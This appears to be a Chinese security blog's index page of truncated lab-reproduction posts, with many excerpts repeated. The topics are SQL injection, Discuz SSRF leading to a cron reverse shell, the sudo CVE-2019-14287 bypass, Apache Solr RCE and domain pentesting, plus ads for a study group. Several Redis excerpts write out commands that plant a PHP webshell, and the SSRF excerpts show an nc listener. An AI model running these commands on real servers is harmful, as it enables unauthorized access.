L18296069161的博客

原创 WEB渗透学习指南!

原创 防止ＳＱＬ注入的五种方法！！！！！！！

一、SQL注入简介SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编程时的疏忽，通过SQL语句，实现无帐号登录，甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入的位置2.判断服务器类型和后台数据库类型3.针对不通的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例比如在一个登录界面，要求输入用户名和密码：可以这样输...

原创 渗透常用工具

.Burpsuite jdk链接：httpspan.baidu.coms14ht8tItbK14q5A-jH6QKWw提取码：i2yg

原创 ssrf漏洞利用操作

#001 环境搭建：Phpstudy+win7搭建discuz漏洞环境把Discuz-3.1 源码拖到网站根目录，然后访问upload目录进行安装，根据提示即可安装完成访问一波：#002 漏洞复现：Centos7，临时关闭防火墙开启nc监听6666端口：nc -lvp 6666查看centos7的ip利用discuz的漏洞向centos7发起一个请求：htt...

原创 网络安全——linux sudo root 权限绕过漏洞复现

一．漏洞描述2019年10月14日，Sudo官方发布了Sudo 1.8.28版本，其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287，当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字，可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确...

原创 Redis未授权如何访问漏洞？

1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了，查看一下文件的内容在浏览器中...

原创 Redis未授权访问漏洞的利用

1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了，查看一下文件的内容在浏览器中...

原创 Redis未授权访问漏洞的利用

1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了，查看一下文件的内容在...

原创 linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

一．漏洞描述2019年10月14日，Sudo官方发布了Sudo 1.8.28版本，其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287，当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字，可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确...

原创 Discuz-ssrf利用计划任务反弹shell

#001 环境搭建：Centos7（安装有apache,php,mysql,redis）利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装，但是访问的时候愣是给我提示目录不存在，并且相关文件不可写但是查看权限是有的经过各种尝试无果，开始了...

原创 Discuz-ssrf利用计划任务反弹shell

#001 环境搭建：Centos7（安装有apache,php,mysql,redis）利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装，但是访问的时候愣是给我提示目录不存在，并且相关文件不可写但是查看权限是有的经过各种尝试无果，开始了...

原创 Apache Solr远程代码执行漏洞 （CVE-2019-0193）复现操作

一．漏洞描述2019年11月16日，Apache官方发布Apache Solr远程代码执行漏洞（CVE-2019-0193）安全通告，此漏洞存在于可选模块DataImportHandler 中，DataImportHandler是用于从数据库或其他源提取数据的常用模块，该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置，由于DIH配置可以包含脚本，因此该参数存在安全隐患。...

原创 Discuz-3.1 ssrf漏洞利用操作

773617250渗透学习交流群，群内定期发布课程直播内容、时间及地址，欢迎大家进群学习！感谢大家的支持！#001 环境搭建： Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录，然后访问upload目录进行安装，根据提示即可 安装完成访问一波：#002 漏洞复现： Centos7，临时关闭防火墙 开启nc监听6666端口：n...

原创 Redis未授权访问漏洞的利用

 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了，查看一下文件的内容...

原创 linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

WEB渗透学习交流群：773617250群内定期通知直播课程、时间及地址，欢迎大家进群学习交流！一． 漏洞描述2019年10月14日，Sudo官方发布了Sudo 1.8.28版本，其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287，当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字，可以通过指定用户ID -1或4294...

原创 Discuz-ssrf利用计划任务反弹shell

渗透学习交流群773617250，群内定期通知课程内容、课程时间及直播地址，欢迎大家进群学习交流！001 环境搭建： Centos7（安装有apache,php,mysql,redis） 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/upload进行安装，但是...

原创 利用redis写webshell

在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了，查看一下文件的内容在浏览器中访问一下这个文件，成功解析，内容改成一...

原创 Redis未授权访问漏洞的利用

渗透学习交流群：群内定期通知课程直播时间及地址，欢迎大家进群学习交流！ 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一...

原创 第十八章——内网渗透之域渗透

渗透学习交流群：773617250进群可免费领取学习工具，群内定期通知直播时间！欢迎大家进群学习交流！感谢大家的支持！MSF在讲域渗透之前，先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点：针对对方是x64的架构 生成一个x64的...

原创 Discuz-ssrf利用计划任务反弹shell

渗透学习交流群：773617250进群免费领取学习教程，群内定期通知直播时间，直播时间可与老师互动，欢迎大家进群学习！#001 环境搭建： Centos7（安装有apache,php,mysql,redis） 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/up...

原创 第十八章——内网渗透之域渗透

773617250渗透学习交流群，进群可领取一套完整学习工具，群内定期通知参加直播课程，直播时间可与老师进行互动。感谢大家的支持！MSF在讲域渗透之前，先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点：针对对方是x64的架构 生成...

原创 Discuz-3.1 ssrf漏洞利用操作

渗透学习交流群：773617250，进群即可领取一套完整的学习工具，群内定期直播，可与老师互动，欢迎大家进群学习交流！感谢大家的支持！#001 环境搭建： Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录，然后访问upload目录进行安装，根据提示即可 安装完成访问一波：#002 漏洞复现： Centos7，临时关闭防火墙 ...

原创 Apache Solr远程代码执行漏洞 （CVE-2019-0193）复现操作

渗透学习交流群：773617250，进群免费领取课程，群定定期直播，可与讲师进行互动。一． 漏洞描述2019年11月16日，Apache官方发布Apache Solr远程代码执行漏洞（CVE-2019-0193）安全通告，此漏洞存在于可选模块DataImportHandler 中，DataImportHandler是用于从数据库或其他源提取数据的常用模块，该模块中所有DIH配置都可以通过外部请...

原创 Redis未授权访问漏洞的利用

渗透学习交流群：773617250，群内定期直播，发布相关教程，欢迎咨询群主学习交流！ 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下...

原创 linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

渗透学习交流群：773617250（群内定期发布相关教程视频，直播）一． 漏洞描述2019年10月14日，Sudo官方发布了Sudo 1.8.28版本，其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287，当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字，可以通过指定用户ID -1或4294967295以root用户身份...